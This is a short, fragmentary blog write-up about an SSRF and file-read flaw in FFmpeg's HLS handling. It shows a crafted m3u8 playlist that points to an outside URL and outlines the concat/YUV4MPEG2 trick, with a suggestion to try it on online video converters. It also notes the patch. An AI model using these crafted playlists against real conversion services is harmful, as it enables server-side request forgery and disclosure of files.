Background
- dozenz of video formats
- hundreds of video/audio codecs
- diffrent bitrates, resolutions, etc.
FFmpeg
what is FFmpeg
According wikipedia, FFmpeg is a free software project that produces libraries and programs for handling multimedia data. In a short it’s a tool video converter.
How FFmpeg really works
Look closer to ffmpeg:extension
Play video out.mp4:
HTTP Live Streaming( HLS )
- Live and on-demand streaming
- Developed by Apple
- Support in FFmpeg
- Docs: https://developer.apple.com/streaming/
m3u8
A file with the M3U8 file extension is a UTF-8 Encoded Audio Playlist file. They are plain text files that can be used by both audio and video players to describe where media files are located. For more https://www.lifewire.com/m3u8-file-2621956
Make an HTTP request
Result:
Read respone
Convert the same above , with content of file heaer.m3u8 like :
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
http://hydrasky.com/?.txt
#EXT-X-ENLIST
Here we are:
Exploit
Concat
Concat:reads a binary stream of data from multiple sources interprets them as if they are from the same source.
YUV4MPEG2
File header.y4m located on server localhost/header.y4m
video.mp4
Yesss, It’s work !
Conclusion
- Solution: FFmpeg protocol whitelist patch
- With lastest version from > 3.2.2 this vulnerable fixed
- There are 3 attack vectors you can exploit include: thumbnail, dns or mp4 .
- The senario simple is upload file video to server support online video converter if it’s using ffmpeg try to exploit
References
https://www.blackhat.com/docs/us-16/materials/us-16-Ermishkin-Viral-Video-Exploiting-Ssrf-In-Video-Converters.pdf
Nice writeup! Helped me solving a CTF!